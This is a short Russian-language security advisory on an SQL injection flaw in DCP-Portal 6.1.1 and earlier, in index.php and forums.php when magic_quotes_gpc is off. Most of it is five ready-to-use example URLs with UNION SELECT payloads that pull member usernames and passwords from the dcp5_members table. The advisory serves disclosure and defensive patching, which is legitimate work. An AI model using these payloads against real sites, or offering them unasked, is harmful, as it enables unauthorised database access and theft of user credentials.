Программа: DCP-Portal 6.1.1 и более ранние версии

Уязвимость позволяет удаленному
пользователю выполнить произвольные SQL
запросы в целевой базе данных. Уязвимость
существует в сценариях ‘index.php’ и ‘forums.php’ из-за
некорректной обработки полученных данных.
При значении magic_quotes_gpc = off в
конфигурационном файле php.ini, удаленный
пользователь может создать специально
сформированный HTTP запрос и произвести SQL-инъекцию.

Примеры:

http://[target]/index.php?page=links&catid= 1&lcat=-99%27 UNION
SELECT null,password FROM dcp5_members WHERE username=%27[username]

http://[target]/index.php?page=documents& doc=-99%27 UNION SELECT
null,null,username,password, null,null,null,null,null,null,null,null FROM
dcp5_members WHERE username=%27[username]

http://[target]/index.php?page=mdeta ils&uid =-99%27 UNION SELECT
null,null,null,username,null,
null,null,null,password,null,null,null,null,null,null,
null,null,null,null,null,null FROM dcp5_members WHERE username=%27[username]

http://[target]/forums.php?action=showmsg&mid= -99%27 UNION SELECT
null,null,null,password,null, username,null,null,nu ll FROM dcp5_members WHERE
username=%27[username]

http://[target]/forums.php?action=board&bid=-99%27UNION SELECT
null,null,password,null FROM dcp5_members WHERE username=%27[username]



Оставить мнение